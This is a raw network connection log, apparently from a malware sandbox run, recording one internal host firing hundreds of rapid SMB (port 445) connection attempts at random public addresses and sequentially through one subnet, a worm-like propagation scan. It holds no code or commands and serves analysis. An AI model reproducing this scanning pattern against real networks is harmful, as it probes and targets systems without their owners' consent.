                                                        Dec 22, 2022 10:04:55.572963953 CET50381445192.168.2.546.192.201.105
                                                        Dec 22, 2022 10:04:55.806797981 CET50382445192.168.2.5114.83.56.81
                                                        Dec 22, 2022 10:04:56.059113026 CET50383445192.168.2.5170.113.163.51
                                                        Dec 22, 2022 10:04:56.087651014 CET50384445192.168.2.535.197.125.38
                                                        Dec 22, 2022 10:04:56.233645916 CET50385445192.168.2.5159.44.36.218
                                                        Dec 22, 2022 10:04:56.291085958 CET50386445192.168.2.581.99.82.176
                                                        Dec 22, 2022 10:04:56.494446039 CET50387445192.168.2.5105.132.200.198
                                                        Dec 22, 2022 10:04:56.681766987 CET50388445192.168.2.5211.184.115.70
                                                        Dec 22, 2022 10:04:56.682111979 CET50390445192.168.2.5120.14.134.144
                                                        Dec 22, 2022 10:04:56.682382107 CET50391445192.168.2.519.186.164.14
                                                        Dec 22, 2022 10:04:56.682668924 CET50392445192.168.2.5189.158.186.138
                                                        Dec 22, 2022 10:04:56.682678938 CET50393445192.168.2.523.205.192.132
                                                        Dec 22, 2022 10:04:56.682811975 CET50395445192.168.2.5177.146.0.179
                                                        Dec 22, 2022 10:04:56.682811975 CET50394445192.168.2.592.123.157.23
                                                        Dec 22, 2022 10:04:56.682986021 CET50396445192.168.2.5168.171.82.173
                                                        Dec 22, 2022 10:04:56.683072090 CET50397445192.168.2.5170.184.198.215
                                                        Dec 22, 2022 10:04:56.684530973 CET50389445192.168.2.524.34.207.210
                                                        Dec 22, 2022 10:04:56.687587023 CET50398445192.168.2.520.158.95.246
                                                        Dec 22, 2022 10:04:56.687632084 CET50400445192.168.2.5119.57.189.130
                                                        Dec 22, 2022 10:04:56.687897921 CET50403445192.168.2.5217.78.176.178
                                                        Dec 22, 2022 10:04:56.687937975 CET50399445192.168.2.5192.46.98.215
                                                        Dec 22, 2022 10:04:56.688123941 CET50402445192.168.2.539.76.116.19
                                                        Dec 22, 2022 10:04:56.688740969 CET50401445192.168.2.5213.76.53.86
                                                        Dec 22, 2022 10:04:56.893208981 CET50404443192.168.2.520.90.156.32
                                                        Dec 22, 2022 10:04:56.893255949 CET4435040420.90.156.32192.168.2.5
                                                        Dec 22, 2022 10:04:56.893369913 CET50404443192.168.2.520.90.156.32
                                                        Dec 22, 2022 10:04:56.894740105 CET50404443192.168.2.520.90.156.32
                                                        Dec 22, 2022 10:04:56.894779921 CET4435040420.90.156.32192.168.2.5
                                                        Dec 22, 2022 10:04:56.932004929 CET50405445192.168.2.548.165.246.218
                                                        Dec 22, 2022 10:04:57.010325909 CET4435040420.90.156.32192.168.2.5
                                                        Dec 22, 2022 10:04:57.010483027 CET50404443192.168.2.520.90.156.32
                                                        Dec 22, 2022 10:04:57.013294935 CET50404443192.168.2.520.90.156.32
                                                        Dec 22, 2022 10:04:57.013331890 CET4435040420.90.156.32192.168.2.5
                                                        Dec 22, 2022 10:04:57.013873100 CET4435040420.90.156.32192.168.2.5
                                                        Dec 22, 2022 10:04:57.015167952 CET50404443192.168.2.520.90.156.32
                                                        Dec 22, 2022 10:04:57.015187025 CET4435040420.90.156.32192.168.2.5
                                                        Dec 22, 2022 10:04:57.015216112 CET50404443192.168.2.520.90.156.32
                                                        Dec 22, 2022 10:04:57.015223980 CET4435040420.90.156.32192.168.2.5
                                                        Dec 22, 2022 10:04:57.015377045 CET50404443192.168.2.520.90.156.32
                                                        Dec 22, 2022 10:04:57.015387058 CET4435040420.90.156.32192.168.2.5
                                                        Dec 22, 2022 10:04:57.054980993 CET4435040420.90.156.32192.168.2.5
                                                        Dec 22, 2022 10:04:57.055075884 CET4435040420.90.156.32192.168.2.5
                                                        Dec 22, 2022 10:04:57.055231094 CET50404443192.168.2.520.90.156.32
                                                        Dec 22, 2022 10:04:57.065788031 CET50404443192.168.2.520.90.156.32
                                                        Dec 22, 2022 10:04:57.065824032 CET4435040420.90.156.32192.168.2.5
                                                        Dec 22, 2022 10:04:57.181209087 CET50406445192.168.2.5132.11.245.167
                                                        Dec 22, 2022 10:04:57.197299957 CET50407445192.168.2.546.193.135.225
                                                        Dec 22, 2022 10:04:57.337970018 CET50408445192.168.2.5199.77.181.116
                                                        Dec 22, 2022 10:04:57.415966988 CET50409445192.168.2.513.185.52.220
                                                        Dec 22, 2022 10:04:57.618875980 CET50410445192.168.2.5174.96.176.201
                                                        Dec 22, 2022 10:04:57.807281971 CET50411445192.168.2.5101.100.202.102
                                                        Dec 22, 2022 10:04:57.808001995 CET50412445192.168.2.5173.156.18.77
                                                        Dec 22, 2022 10:04:57.808636904 CET50413445192.168.2.536.110.14.228
                                                        Dec 22, 2022 10:04:57.809223890 CET50414445192.168.2.5161.78.37.64
                                                        Dec 22, 2022 10:04:57.809793949 CET50415445192.168.2.553.90.240.154
                                                        Dec 22, 2022 10:04:57.810363054 CET50416445192.168.2.5134.34.129.72
                                                        Dec 22, 2022 10:04:57.811034918 CET50417445192.168.2.519.146.144.110
                                                        Dec 22, 2022 10:04:57.811235905 CET50418445192.168.2.5182.251.34.137
                                                        Dec 22, 2022 10:04:57.811357021 CET50419445192.168.2.5167.1.198.0
                                                        Dec 22, 2022 10:04:57.811460018 CET50420445192.168.2.583.251.185.204
                                                        Dec 22, 2022 10:04:57.811559916 CET50421445192.168.2.5202.177.199.249
                                                        Dec 22, 2022 10:04:57.811656952 CET50422445192.168.2.5120.183.165.145
                                                        Dec 22, 2022 10:04:57.811783075 CET50423445192.168.2.542.42.212.163
                                                        Dec 22, 2022 10:04:57.812066078 CET50424445192.168.2.519.230.94.253
                                                        Dec 22, 2022 10:04:57.812184095 CET50425445192.168.2.596.3.74.7
                                                        Dec 22, 2022 10:04:57.812299013 CET50426445192.168.2.5118.235.178.14
                                                        Dec 22, 2022 10:04:58.056309938 CET50427445192.168.2.5154.38.80.148
                                                        Dec 22, 2022 10:04:58.072809935 CET50428445192.168.2.5112.123.21.230
                                                        Dec 22, 2022 10:04:58.290831089 CET50429445192.168.2.520.201.208.46
                                                        Dec 22, 2022 10:04:58.310480118 CET50430445192.168.2.564.10.215.184
                                                        Dec 22, 2022 10:04:58.464289904 CET50431445192.168.2.587.227.234.122
                                                        Dec 22, 2022 10:04:58.525866032 CET50432445192.168.2.56.211.61.249
                                                        Dec 22, 2022 10:04:58.745980024 CET50433445192.168.2.567.86.108.59
                                                        Dec 22, 2022 10:04:59.125096083 CET50434445192.168.2.5167.73.105.240
                                                        Dec 22, 2022 10:04:59.125974894 CET50435445192.168.2.5164.20.215.168
                                                        Dec 22, 2022 10:04:59.127607107 CET50436445192.168.2.578.115.70.233
                                                        Dec 22, 2022 10:04:59.128473043 CET50437445192.168.2.560.172.186.89
                                                        Dec 22, 2022 10:04:59.129092932 CET50438445192.168.2.5134.60.35.135
                                                        Dec 22, 2022 10:04:59.129290104 CET50439445192.168.2.514.23.131.74
                                                        Dec 22, 2022 10:04:59.129367113 CET50440445192.168.2.595.254.143.124
                                                        Dec 22, 2022 10:04:59.129421949 CET50441445192.168.2.5189.30.170.28
                                                        Dec 22, 2022 10:04:59.129554987 CET50442445192.168.2.581.250.41.244
                                                        Dec 22, 2022 10:04:59.129554987 CET50443445192.168.2.5125.172.196.55
                                                        Dec 22, 2022 10:04:59.129797935 CET50444445192.168.2.5148.181.12.43
                                                        Dec 22, 2022 10:04:59.129923105 CET50445445192.168.2.5107.147.122.106
                                                        Dec 22, 2022 10:04:59.129971981 CET50446445192.168.2.5112.100.249.53
                                                        Dec 22, 2022 10:04:59.130106926 CET50447445192.168.2.568.115.208.241
                                                        Dec 22, 2022 10:04:59.130610943 CET50448445192.168.2.578.91.49.208
                                                        Dec 22, 2022 10:04:59.130918980 CET50449445192.168.2.5209.86.203.92
                                                        Dec 22, 2022 10:04:59.228653908 CET50450445192.168.2.5162.154.242.106
                                                        Dec 22, 2022 10:04:59.228760958 CET50451445192.168.2.5110.54.52.43
                                                        Dec 22, 2022 10:04:59.230360985 CET804970393.184.220.29192.168.2.5
                                                        Dec 22, 2022 10:04:59.230590105 CET4970380192.168.2.593.184.220.29
                                                        Dec 22, 2022 10:04:59.419941902 CET50452445192.168.2.525.97.240.18
                                                        Dec 22, 2022 10:04:59.420077085 CET50453445192.168.2.597.151.89.196
                                                        Dec 22, 2022 10:04:59.641197920 CET50454445192.168.2.574.63.248.40
                                                        Dec 22, 2022 10:04:59.641491890 CET50455445192.168.2.562.217.194.91
                                                        Dec 22, 2022 10:04:59.869146109 CET50456445192.168.2.584.48.66.192
                                                        Dec 22, 2022 10:04:59.934982061 CET4455045684.48.66.192192.168.2.5
                                                        Dec 22, 2022 10:05:00.446816921 CET50456445192.168.2.584.48.66.192
                                                        Dec 22, 2022 10:05:00.513968945 CET4455045684.48.66.192192.168.2.5
                                                        Dec 22, 2022 10:05:00.603728056 CET50457445192.168.2.523.248.20.73
                                                        Dec 22, 2022 10:05:00.603899002 CET50458445192.168.2.5160.37.242.209
                                                        Dec 22, 2022 10:05:00.604027987 CET50459445192.168.2.5104.194.183.66
                                                        Dec 22, 2022 10:05:00.604125023 CET50460445192.168.2.5156.109.188.38
                                                        Dec 22, 2022 10:05:00.604809999 CET50461445192.168.2.572.7.143.39
                                                        Dec 22, 2022 10:05:00.605324030 CET50462445192.168.2.5186.71.55.11
                                                        Dec 22, 2022 10:05:00.605585098 CET50463445192.168.2.580.52.13.103
                                                        Dec 22, 2022 10:05:00.605880976 CET50464445192.168.2.5214.46.13.8
                                                        Dec 22, 2022 10:05:00.606019974 CET50465445192.168.2.5113.54.58.0
                                                        Dec 22, 2022 10:05:00.606137037 CET50466445192.168.2.5133.114.86.28
                                                        Dec 22, 2022 10:05:00.606278896 CET50467445192.168.2.5132.198.252.90
                                                        Dec 22, 2022 10:05:00.606405973 CET50468445192.168.2.5170.224.191.156
                                                        Dec 22, 2022 10:05:00.606664896 CET50469445192.168.2.54.158.245.206
                                                        Dec 22, 2022 10:05:00.606821060 CET50470445192.168.2.5111.169.94.101
                                                        Dec 22, 2022 10:05:00.606955051 CET50471445192.168.2.5209.198.68.161
                                                        Dec 22, 2022 10:05:00.607548952 CET50472445192.168.2.5133.170.231.123
                                                        Dec 22, 2022 10:05:00.608192921 CET50473445192.168.2.5153.105.200.45
                                                        Dec 22, 2022 10:05:00.608860016 CET50474445192.168.2.546.32.103.111
                                                        Dec 22, 2022 10:05:00.609400034 CET50475445192.168.2.5128.180.71.128
                                                        Dec 22, 2022 10:05:00.610043049 CET50476445192.168.2.5137.80.86.163
                                                        Dec 22, 2022 10:05:00.613595009 CET50477445192.168.2.547.133.144.248
                                                        Dec 22, 2022 10:05:00.754807949 CET44550467132.198.252.90192.168.2.5
                                                        Dec 22, 2022 10:05:00.842503071 CET50478445192.168.2.5148.4.254.7
                                                        Dec 22, 2022 10:05:00.842602968 CET50479445192.168.2.543.131.208.52
                                                        Dec 22, 2022 10:05:01.056945086 CET50480445192.168.2.577.180.65.39
                                                        Dec 22, 2022 10:05:01.259536028 CET50467445192.168.2.5132.198.252.90
                                                        Dec 22, 2022 10:05:01.408164978 CET44550467132.198.252.90192.168.2.5
                                                        Dec 22, 2022 10:05:02.505734921 CET50481445192.168.2.537.137.166.242
                                                        Dec 22, 2022 10:05:02.505901098 CET50482445192.168.2.5183.7.107.235
                                                        Dec 22, 2022 10:05:02.506017923 CET50483445192.168.2.519.204.145.237
                                                        Dec 22, 2022 10:05:02.506149054 CET50484445192.168.2.5204.60.125.39
                                                        Dec 22, 2022 10:05:02.506732941 CET50485445192.168.2.529.76.154.210
                                                        Dec 22, 2022 10:05:02.507306099 CET50486445192.168.2.511.11.229.15
                                                        Dec 22, 2022 10:05:02.507488966 CET50487445192.168.2.5125.32.17.105
                                                        Dec 22, 2022 10:05:02.507611990 CET50488445192.168.2.5151.40.220.248
                                                        Dec 22, 2022 10:05:02.507709026 CET50489445192.168.2.5138.228.148.161
                                                        Dec 22, 2022 10:05:02.507826090 CET50490445192.168.2.589.49.206.183
                                                        Dec 22, 2022 10:05:02.508143902 CET50492445192.168.2.564.118.193.219
                                                        Dec 22, 2022 10:05:02.508143902 CET50491445192.168.2.554.211.145.27
                                                        Dec 22, 2022 10:05:02.508342028 CET50493445192.168.2.561.233.243.137
                                                        Dec 22, 2022 10:05:02.508446932 CET50494445192.168.2.587.10.96.248
                                                        Dec 22, 2022 10:05:02.508563995 CET50495445192.168.2.513.26.151.196
                                                        Dec 22, 2022 10:05:02.509155035 CET50496445192.168.2.598.242.192.235
                                                        Dec 22, 2022 10:05:02.512242079 CET50497445192.168.2.522.24.215.1
                                                        Dec 22, 2022 10:05:02.512999058 CET50498445192.168.2.5111.74.243.47
                                                        Dec 22, 2022 10:05:02.513612032 CET50499445192.168.2.5219.153.245.204
                                                        Dec 22, 2022 10:05:02.514148951 CET50500445192.168.2.5168.137.12.93
                                                        Dec 22, 2022 10:05:02.514625072 CET50501445192.168.2.57.229.172.160
                                                        Dec 22, 2022 10:05:02.679208994 CET50502445192.168.2.5216.56.92.221
                                                        Dec 22, 2022 10:05:02.679399967 CET50503445192.168.2.52.49.141.128
                                                        Dec 22, 2022 10:05:02.679702044 CET50504445192.168.2.542.213.110.24
                                                        Dec 22, 2022 10:05:02.747581959 CET50505445192.168.2.5178.58.95.251
                                                        Dec 22, 2022 10:05:03.619551897 CET50506445192.168.2.5220.221.207.78
                                                        Dec 22, 2022 10:05:03.619748116 CET50507445192.168.2.580.124.13.116
                                                        Dec 22, 2022 10:05:03.619864941 CET50508445192.168.2.5165.219.238.197
                                                        Dec 22, 2022 10:05:03.619986057 CET50509445192.168.2.574.41.38.254
                                                        Dec 22, 2022 10:05:03.620805025 CET50510445192.168.2.549.127.242.96
                                                        Dec 22, 2022 10:05:03.621570110 CET50511445192.168.2.5141.199.123.144
                                                        Dec 22, 2022 10:05:03.621862888 CET50512445192.168.2.516.253.253.217
                                                        Dec 22, 2022 10:05:03.622111082 CET50513445192.168.2.598.210.146.40
                                                        Dec 22, 2022 10:05:03.622263908 CET50514445192.168.2.538.116.136.7
                                                        Dec 22, 2022 10:05:03.622360945 CET50515445192.168.2.530.147.140.123
                                                        Dec 22, 2022 10:05:03.622451067 CET50516445192.168.2.5104.89.31.247
                                                        Dec 22, 2022 10:05:03.622689962 CET50517445192.168.2.5105.241.105.16
                                                        Dec 22, 2022 10:05:03.622870922 CET50518445192.168.2.5208.3.21.123
                                                        Dec 22, 2022 10:05:03.623117924 CET50519445192.168.2.5135.119.14.49
                                                        Dec 22, 2022 10:05:03.623226881 CET50520445192.168.2.5189.177.198.152
                                                        Dec 22, 2022 10:05:03.624005079 CET50521445192.168.2.545.89.202.170
                                                        Dec 22, 2022 10:05:03.635893106 CET50522445192.168.2.576.251.3.172
                                                        Dec 22, 2022 10:05:03.636796951 CET50523445192.168.2.5141.127.2.6
                                                        Dec 22, 2022 10:05:03.637577057 CET50524445192.168.2.514.26.153.246
                                                        Dec 22, 2022 10:05:03.638305902 CET50525445192.168.2.57.36.216.151
                                                        Dec 22, 2022 10:05:03.638583899 CET50526445192.168.2.5101.226.81.134
                                                        Dec 22, 2022 10:05:03.795595884 CET50527445192.168.2.518.254.243.27
                                                        Dec 22, 2022 10:05:03.795624971 CET50528445192.168.2.518.10.195.42
                                                        Dec 22, 2022 10:05:03.795900106 CET50529445192.168.2.5176.132.2.171
                                                        Dec 22, 2022 10:05:03.854131937 CET50530445192.168.2.5154.128.160.18
                                                        Dec 22, 2022 10:05:04.729238033 CET50531445192.168.2.5129.176.26.199
                                                        Dec 22, 2022 10:05:04.729574919 CET50532445192.168.2.5124.164.37.130
                                                        Dec 22, 2022 10:05:04.729682922 CET50533445192.168.2.510.24.197.126
                                                        Dec 22, 2022 10:05:04.729794979 CET50534445192.168.2.542.80.174.102
                                                        Dec 22, 2022 10:05:04.730319023 CET50535445192.168.2.5136.231.156.34
                                                        Dec 22, 2022 10:05:04.731055021 CET50536445192.168.2.5163.35.229.228
                                                        Dec 22, 2022 10:05:04.731297016 CET50537445192.168.2.5202.24.32.61
                                                        Dec 22, 2022 10:05:04.731400967 CET50538445192.168.2.515.5.133.164
                                                        Dec 22, 2022 10:05:04.731590033 CET50539445192.168.2.5214.205.59.95
                                                        Dec 22, 2022 10:05:04.731688023 CET50540445192.168.2.5130.175.205.186
                                                        Dec 22, 2022 10:05:04.731848955 CET50541445192.168.2.5175.113.79.184
                                                        Dec 22, 2022 10:05:04.731923103 CET50542445192.168.2.570.188.92.138
                                                        Dec 22, 2022 10:05:04.732162952 CET50543445192.168.2.539.192.68.5
                                                        Dec 22, 2022 10:05:04.732333899 CET50544445192.168.2.5180.116.12.179
                                                        Dec 22, 2022 10:05:04.732426882 CET50545445192.168.2.5117.150.63.187
                                                        Dec 22, 2022 10:05:04.732948065 CET50546445192.168.2.544.207.124.169
                                                        Dec 22, 2022 10:05:04.745007038 CET50547445192.168.2.571.23.254.6
                                                        Dec 22, 2022 10:05:04.745568037 CET50548445192.168.2.511.202.159.7
                                                        Dec 22, 2022 10:05:04.747548103 CET50549445192.168.2.5158.165.156.254
                                                        Dec 22, 2022 10:05:04.747611046 CET50550445192.168.2.535.230.122.199
                                                        Dec 22, 2022 10:05:04.747684002 CET50551445192.168.2.534.38.54.87
                                                        Dec 22, 2022 10:05:04.748938084 CET50552445192.168.2.541.203.13.51
                                                        Dec 22, 2022 10:05:04.916784048 CET50553445192.168.2.5118.16.233.88
                                                        Dec 22, 2022 10:05:04.917090893 CET50554445192.168.2.5104.32.99.200
                                                        Dec 22, 2022 10:05:04.917944908 CET50555445192.168.2.515.223.110.127
                                                        Dec 22, 2022 10:05:04.938412905 CET4455055241.203.13.51192.168.2.5
                                                        Dec 22, 2022 10:05:04.938663006 CET50552445192.168.2.541.203.13.51
                                                        Dec 22, 2022 10:05:04.938985109 CET50552445192.168.2.541.203.13.51
                                                        Dec 22, 2022 10:05:04.939279079 CET50556445192.168.2.541.203.13.1
                                                        Dec 22, 2022 10:05:04.964562893 CET50557445192.168.2.5201.189.44.91
                                                        Dec 22, 2022 10:05:05.128173113 CET4455055241.203.13.51192.168.2.5
                                                        Dec 22, 2022 10:05:05.128237963 CET4455055241.203.13.51192.168.2.5
                                                        Dec 22, 2022 10:05:05.854880095 CET50558445192.168.2.5189.145.151.112
                                                        Dec 22, 2022 10:05:05.855144978 CET50559445192.168.2.5220.10.90.113
                                                        Dec 22, 2022 10:05:05.855246067 CET50560445192.168.2.540.142.121.116
                                                        Dec 22, 2022 10:05:05.855375051 CET50561445192.168.2.527.203.227.103
                                                        Dec 22, 2022 10:05:05.855519056 CET50563445192.168.2.5206.129.253.172
                                                        Dec 22, 2022 10:05:05.855525970 CET50562445192.168.2.5188.75.189.109
                                                        Dec 22, 2022 10:05:05.855633974 CET50564445192.168.2.5160.63.83.86
                                                        Dec 22, 2022 10:05:05.855711937 CET50565445192.168.2.5161.1.249.27
                                                        Dec 22, 2022 10:05:05.855834007 CET50567445192.168.2.573.183.172.195
                                                        Dec 22, 2022 10:05:05.855837107 CET50566445192.168.2.54.28.154.31
                                                        Dec 22, 2022 10:05:05.856010914 CET50568445192.168.2.5115.185.168.232
                                                        Dec 22, 2022 10:05:05.856026888 CET50569445192.168.2.511.81.138.248
                                                        Dec 22, 2022 10:05:05.856090069 CET50570445192.168.2.5183.164.116.195
                                                        Dec 22, 2022 10:05:05.856244087 CET50571445192.168.2.5103.175.10.159
                                                        Dec 22, 2022 10:05:05.858076096 CET50572445192.168.2.5221.134.145.132
                                                        Dec 22, 2022 10:05:05.859066963 CET50573445192.168.2.535.246.224.133
                                                        Dec 22, 2022 10:05:05.859230995 CET50575445192.168.2.5130.188.46.201
                                                        Dec 22, 2022 10:05:05.859231949 CET50574445192.168.2.5120.192.203.122
                                                        Dec 22, 2022 10:05:05.859297037 CET50576445192.168.2.5134.54.220.139
                                                        Dec 22, 2022 10:05:05.859384060 CET50577445192.168.2.5202.149.164.202
                                                        Dec 22, 2022 10:05:05.859384060 CET50578445192.168.2.5109.250.38.109
                                                        Dec 22, 2022 10:05:06.011428118 CET50579445192.168.2.541.203.13.2
                                                        Dec 22, 2022 10:05:06.042180061 CET50580445192.168.2.5103.117.4.57
                                                        Dec 22, 2022 10:05:06.042427063 CET50581445192.168.2.523.152.136.202
                                                        Dec 22, 2022 10:05:06.042720079 CET50582445192.168.2.519.70.4.230
                                                        Dec 22, 2022 10:05:06.104013920 CET50583445192.168.2.5151.114.124.4
                                                        Dec 22, 2022 10:05:06.761284113 CET50584445192.168.2.5198.24.71.120
                                                        Dec 22, 2022 10:05:06.964436054 CET50585445192.168.2.567.226.207.242
                                                        Dec 22, 2022 10:05:06.966269970 CET50586445192.168.2.5152.68.141.94
                                                        Dec 22, 2022 10:05:06.974999905 CET50587445192.168.2.5198.6.71.42
                                                        Dec 22, 2022 10:05:06.975008965 CET50588445192.168.2.5128.153.15.225
                                                        Dec 22, 2022 10:05:06.975172043 CET50589445192.168.2.5150.49.239.153
                                                        Dec 22, 2022 10:05:06.975338936 CET50590445192.168.2.5148.232.5.127
                                                        Dec 22, 2022 10:05:06.975383997 CET50591445192.168.2.5139.96.40.116
                                                        Dec 22, 2022 10:05:06.975560904 CET50592445192.168.2.5129.237.23.219
                                                        Dec 22, 2022 10:05:06.975560904 CET50593445192.168.2.5135.191.45.60
                                                        Dec 22, 2022 10:05:06.975649118 CET50594445192.168.2.5189.88.89.202
                                                        Dec 22, 2022 10:05:06.975771904 CET50596445192.168.2.5178.15.32.150
                                                        Dec 22, 2022 10:05:06.975775957 CET50595445192.168.2.519.125.113.29
                                                        Dec 22, 2022 10:05:06.975810051 CET50597445192.168.2.5120.172.35.30
                                                        Dec 22, 2022 10:05:06.975883007 CET50598445192.168.2.5115.197.9.106
                                                        Dec 22, 2022 10:05:06.975964069 CET50599445192.168.2.521.5.107.117
                                                        Dec 22, 2022 10:05:06.975997925 CET50600445192.168.2.5105.140.59.206
                                                        Dec 22, 2022 10:05:06.976850986 CET50601445192.168.2.5198.176.46.82
                                                        Dec 22, 2022 10:05:06.977648973 CET50602445192.168.2.592.101.59.192
                                                        Dec 22, 2022 10:05:06.977684975 CET50603445192.168.2.579.184.252.238
                                                        Dec 22, 2022 10:05:06.977720976 CET50604445192.168.2.5203.36.163.49
                                                        Dec 22, 2022 10:05:06.977791071 CET50605445192.168.2.558.28.238.207
                                                        Dec 22, 2022 10:05:07.088524103 CET50606445192.168.2.541.203.13.3
                                                        Dec 22, 2022 10:05:07.168231010 CET50607445192.168.2.521.183.74.155
                                                        Dec 22, 2022 10:05:07.168392897 CET50608445192.168.2.5171.3.110.137
                                                        Dec 22, 2022 10:05:07.168395996 CET50609445192.168.2.564.210.234.162
                                                        Dec 22, 2022 10:05:07.229192019 CET50610445192.168.2.594.136.204.203
                                                        Dec 22, 2022 10:05:07.870266914 CET50611445192.168.2.521.197.73.201
                                                        Dec 22, 2022 10:05:08.088696003 CET50612445192.168.2.5203.8.40.83
                                                        Dec 22, 2022 10:05:08.088900089 CET50615445192.168.2.525.89.249.152
                                                        Dec 22, 2022 10:05:08.088980913 CET50616445192.168.2.5204.250.250.247
                                                        Dec 22, 2022 10:05:08.089092016 CET50617445192.168.2.5142.12.67.5
                                                        Dec 22, 2022 10:05:08.089155912 CET50618445192.168.2.5177.149.51.51
                                                        Dec 22, 2022 10:05:08.089282036 CET50619445192.168.2.5212.143.90.132
                                                        Dec 22, 2022 10:05:08.089382887 CET50620445192.168.2.533.159.208.110
                                                        Dec 22, 2022 10:05:08.089483023 CET50622445192.168.2.5213.114.37.96
                                                        Dec 22, 2022 10:05:08.089497089 CET50623445192.168.2.5147.125.36.200
                                                        Dec 22, 2022 10:05:08.089617014 CET50624445192.168.2.57.138.125.96
                                                        Dec 22, 2022 10:05:08.089643955 CET50625445192.168.2.585.123.9.103
                                                        Dec 22, 2022 10:05:08.092252970 CET50626445192.168.2.5105.12.64.31
                                                        Dec 22, 2022 10:05:08.096411943 CET50627445192.168.2.5195.154.1.90
                                                        Dec 22, 2022 10:05:08.096586943 CET50628445192.168.2.57.129.156.63
                                                        Dec 22, 2022 10:05:08.096648932 CET50629445192.168.2.5200.119.177.126
                                                        Dec 22, 2022 10:05:08.096744061 CET50631445192.168.2.5123.52.135.176
                                                        Dec 22, 2022 10:05:08.096750021 CET50630445192.168.2.576.22.5.132
                                                        Dec 22, 2022 10:05:08.096831083 CET50632445192.168.2.534.156.81.136
                                                        Dec 22, 2022 10:05:08.172077894 CET50633445192.168.2.541.203.13.4
                                                        Dec 22, 2022 10:05:08.279165983 CET50634445192.168.2.580.127.20.8
                                                        Dec 22, 2022 10:05:08.279294968 CET50635445192.168.2.526.106.180.129
                                                        Dec 22, 2022 10:05:08.279428005 CET50636445192.168.2.5195.49.4.252
                                                        Dec 22, 2022 10:05:08.338658094 CET50637445192.168.2.540.107.208.178
                                                        Dec 22, 2022 10:05:08.676580906 CET50638443192.168.2.520.90.153.243
                                                        Dec 22, 2022 10:05:08.676630974 CET4435063820.90.153.243192.168.2.5
                                                        Dec 22, 2022 10:05:08.676887035 CET50638443192.168.2.520.90.153.243
                                                        Dec 22, 2022 10:05:08.678076982 CET50638443192.168.2.520.90.153.243
                                                        Dec 22, 2022 10:05:08.678111076 CET4435063820.90.153.243192.168.2.5
                                                        Dec 22, 2022 10:05:08.779649973 CET4435063820.90.153.243192.168.2.5
                                                        Dec 22, 2022 10:05:08.779763937 CET50638443192.168.2.520.90.153.243
                                                        Dec 22, 2022 10:05:08.780432940 CET50639445192.168.2.5102.63.30.140
                                                        Dec 22, 2022 10:05:08.782995939 CET50638443192.168.2.520.90.153.243
                                                        Dec 22, 2022 10:05:08.783014059 CET4435063820.90.153.243192.168.2.5
                                                        Dec 22, 2022 10:05:08.783770084 CET4435063820.90.153.243192.168.2.5
                                                        Dec 22, 2022 10:05:08.785190105 CET50638443192.168.2.520.90.153.243
                                                        Dec 22, 2022 10:05:08.785211086 CET4435063820.90.153.243192.168.2.5
                                                        Dec 22, 2022 10:05:08.785276890 CET50638443192.168.2.520.90.153.243
                                                        Dec 22, 2022 10:05:08.785283089 CET4435063820.90.153.243192.168.2.5
                                                        Dec 22, 2022 10:05:08.785469055 CET50638443192.168.2.520.90.153.243
                                                        Dec 22, 2022 10:05:08.785473108 CET4435063820.90.153.243192.168.2.5
                                                        Dec 22, 2022 10:05:08.815654993 CET4435063820.90.153.243192.168.2.5
                                                        Dec 22, 2022 10:05:08.815835953 CET4435063820.90.153.243192.168.2.5
                                                        Dec 22, 2022 10:05:08.816026926 CET50638443192.168.2.520.90.153.243
                                                        Dec 22, 2022 10:05:08.816215038 CET50638443192.168.2.520.90.153.243
                                                        Dec 22, 2022 10:05:08.816234112 CET4435063820.90.153.243192.168.2.5
                                                        Dec 22, 2022 10:05:08.979454994 CET50640445192.168.2.560.75.24.166
                                                        Dec 22, 2022 10:05:09.214267969 CET50641445192.168.2.5211.217.169.198
                                                        Dec 22, 2022 10:05:09.214565039 CET50642445192.168.2.583.34.179.254
                                                        Dec 22, 2022 10:05:09.215056896 CET50643445192.168.2.5139.196.175.244
                                                        Dec 22, 2022 10:05:09.215337038 CET50644445192.168.2.5169.234.62.97
                                                        Dec 22, 2022 10:05:09.215548992 CET50645445192.168.2.519.23.216.187
                                                        Dec 22, 2022 10:05:09.215965033 CET50646445192.168.2.5153.99.60.54
                                                        Dec 22, 2022 10:05:09.216327906 CET50647445192.168.2.5187.152.179.20
                                                        Dec 22, 2022 10:05:09.216644049 CET50648445192.168.2.567.151.8.249
                                                        Dec 22, 2022 10:05:09.216789007 CET50649445192.168.2.5195.146.86.43
                                                        Dec 22, 2022 10:05:09.217017889 CET50650445192.168.2.5164.86.67.90
                                                        Dec 22, 2022 10:05:09.217782974 CET50651445192.168.2.51.74.8.17
                                                        Dec 22, 2022 10:05:09.218113899 CET50652445192.168.2.5151.16.203.125
                                                        Dec 22, 2022 10:05:09.218461990 CET50653445192.168.2.5101.234.188.188
                                                        Dec 22, 2022 10:05:09.219036102 CET50654445192.168.2.550.75.159.36
                                                        Dec 22, 2022 10:05:09.221272945 CET50655445192.168.2.516.115.112.153
                                                        Dec 22, 2022 10:05:09.222913027 CET50656445192.168.2.521.172.57.178
                                                        Dec 22, 2022 10:05:09.224786997 CET50657445192.168.2.5175.191.18.89
                                                        Dec 22, 2022 10:05:09.227380037 CET50658445192.168.2.5153.140.99.111
                                                        Dec 22, 2022 10:05:09.229444027 CET50659445192.168.2.554.136.9.69
                                                        Dec 22, 2022 10:05:09.230407000 CET50660445192.168.2.5184.67.225.198
                                                        Dec 22, 2022 10:05:09.230927944 CET50661445192.168.2.5222.165.29.94
                                                        Dec 22, 2022 10:05:09.231302977 CET50662445192.168.2.541.203.13.5
                                                        Dec 22, 2022 10:05:09.401093960 CET50664445192.168.2.5163.88.197.24
                                                        Dec 22, 2022 10:05:09.401113987 CET50663445192.168.2.5223.75.158.135
                                                        Dec 22, 2022 10:05:09.401310921 CET50665445192.168.2.550.227.193.103
                                                        Dec 22, 2022 10:05:09.465507030 CET50666445192.168.2.569.97.0.184
                                                        Dec 22, 2022 10:05:09.902532101 CET50667445192.168.2.5122.50.90.225
                                                        Dec 22, 2022 10:05:10.105382919 CET50668445192.168.2.5205.171.216.107
                                                        Dec 22, 2022 10:05:10.307538986 CET50669445192.168.2.541.203.13.6
                                                        Dec 22, 2022 10:05:10.339169979 CET50670445192.168.2.5172.195.47.120
                                                        Dec 22, 2022 10:05:10.339468956 CET50671445192.168.2.513.42.161.47
                                                        Dec 22, 2022 10:05:10.339593887 CET50672445192.168.2.588.167.187.87
                                                        Dec 22, 2022 10:05:10.339725971 CET50673445192.168.2.580.3.114.222
                                                        Dec 22, 2022 10:05:10.339869976 CET50674445192.168.2.5169.173.0.43
